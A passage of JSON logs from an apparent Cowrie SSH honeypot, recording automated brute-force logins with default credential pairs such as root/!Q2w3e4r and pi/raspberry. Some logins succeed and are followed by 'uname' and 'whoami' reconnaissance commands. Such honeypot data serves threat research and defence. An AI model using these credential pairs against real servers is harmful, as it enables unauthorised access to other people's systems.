 client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:11:21.043713Z","src_ip":"51.79.164.132","session":"d3397ee4e948"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:21.359925Z","src_ip":"212.227.125.160","session":"be1861b3a340"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":50210,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f8d704c49e","protocol":"ssh","message":"New connection: 116.198.207.211:50210 (1.2.3.4:22) [session: 78f8d704c49e]","sensor":"my-vps","timestamp":"2025-08-28T10:11:26.528016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:11:26.993054Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:11:26.993803Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-28T10:11:28.205562Z","src_ip":"51.79.164.132","session":"d3397ee4e948"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:11:28.478239Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:11:28.957106Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:11:28.957801Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:29.187645Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:29.188743Z","src_ip":"116.198.207.211","session":"78f8d704c49e"}
{"eventid":"cowrie.session.closed","duration":"12.4","message":"Connection lost after 12.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:30.698302Z","src_ip":"51.79.164.132","session":"d3397ee4e948"}
{"eventid":"cowrie.session.connect","src_ip":"116.198.207.211","src_port":35248,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5316741deb","protocol":"ssh","message":"New connection: 116.198.207.211:35248 (1.2.3.4:22) [session: bb5316741deb]","sensor":"my-vps","timestamp":"2025-08-28T10:11:33.796686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:11:33.797633Z","src_ip":"116.198.207.211","session":"bb5316741deb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:11:34.002985Z","src_ip":"116.198.207.211","session":"bb5316741deb"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T10:11:34.624381Z","src_ip":"116.198.207.211","session":"bb5316741deb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39222,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd11475bee4","protocol":"ssh","message":"New connection: 51.79.164.132:39222 (1.2.3.4:22) [session: 1fd11475bee4]","sensor":"my-vps","timestamp":"2025-08-28T10:11:46.314577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:11:47.782290Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:11:47.783111Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:11:53.420970Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:11:56.366597Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:11:56.367409Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:57.179068Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:11:57.180560Z","src_ip":"51.79.164.132","session":"1fd11475bee4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33212,"dst_ip":"1.2.3.4","dst_port":22,"session":"3665efa13e39","protocol":"ssh","message":"New connection: 51.79.164.132:33212 (1.2.3.4:22) [session: 3665efa13e39]","sensor":"my-vps","timestamp":"2025-08-28T10:12:14.145195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:12:14.709079Z","src_ip":"51.79.164.132","session":"3665efa13e39"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:12:14.719397Z","src_ip":"51.79.164.132","session":"3665efa13e39"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-28T10:12:18.549638Z","src_ip":"51.79.164.132","session":"3665efa13e39"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:12:20.569145Z","src_ip":"51.79.164.132","session":"3665efa13e39"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":63931,"dst_ip":"1.2.3.4","dst_port":22,"session":"f121b5ccb9a9","protocol":"ssh","message":"New connection: 186.225.142.90:63931 (1.2.3.4:22) [session: f121b5ccb9a9]","sensor":"my-vps","timestamp":"2025-08-28T10:12:27.456610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:12:27.775075Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:12:27.775746Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.login.success","username":"root","password":"0987654321%%%","message":"login attempt [root/0987654321%%%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:12:29.723670Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:12:30.594879Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T10:12:30.595539Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:12:31.005884Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:12:31.177014Z","src_ip":"186.225.142.90","session":"f121b5ccb9a9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":38024,"dst_ip":"1.2.3.4","dst_port":22,"session":"01c4f0e49526","protocol":"ssh","message":"New connection: 51.79.164.132:38024 (1.2.3.4:22) [session: 01c4f0e49526]","sensor":"my-vps","timestamp":"2025-08-28T10:12:40.975158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:12:41.255171Z","src_ip":"51.79.164.132","session":"01c4f0e49526"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:12:41.255831Z","src_ip":"51.79.164.132","session":"01c4f0e49526"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-28T10:12:44.510286Z","src_ip":"51.79.164.132","session":"01c4f0e49526"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:12:45.874611Z","src_ip":"51.79.164.132","session":"01c4f0e49526"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48398,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9ef1406dea7","protocol":"ssh","message":"New connection: 51.79.164.132:48398 (1.2.3.4:22) [session: c9ef1406dea7]","sensor":"my-vps","timestamp":"2025-08-28T10:13:07.452916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:13:07.750855Z","src_ip":"51.79.164.132","session":"c9ef1406dea7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:13:07.751567Z","src_ip":"51.79.164.132","session":"c9ef1406dea7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:13:11.068532Z","src_ip":"51.79.164.132","session":"c9ef1406dea7"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:13:12.401421Z","src_ip":"51.79.164.132","session":"c9ef1406dea7"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:13:33.799324Z","src_ip":"116.198.207.211","session":"bb5316741deb"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56744,"dst_ip":"1.2.3.4","dst_port":22,"session":"02ff0bd8fdcf","protocol":"ssh","message":"New connection: 51.79.164.132:56744 (1.2.3.4:22) [session: 02ff0bd8fdcf]","sensor":"my-vps","timestamp":"2025-08-28T10:13:33.832951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:13:33.971331Z","src_ip":"51.79.164.132","session":"02ff0bd8fdcf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:13:34.515369Z","src_ip":"51.79.164.132","session":"02ff0bd8fdcf"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:13:35.940394Z","src_ip":"51.79.164.132","session":"02ff0bd8fdcf"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:13:37.538270Z","src_ip":"51.79.164.132","session":"02ff0bd8fdcf"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54524,"dst_ip":"1.2.3.4","dst_port":22,"session":"66012ec3485b","protocol":"ssh","message":"New connection: 51.79.164.132:54524 (1.2.3.4:22) [session: 66012ec3485b]","sensor":"my-vps","timestamp":"2025-08-28T10:14:00.581482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:14:00.750219Z","src_ip":"51.79.164.132","session":"66012ec3485b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh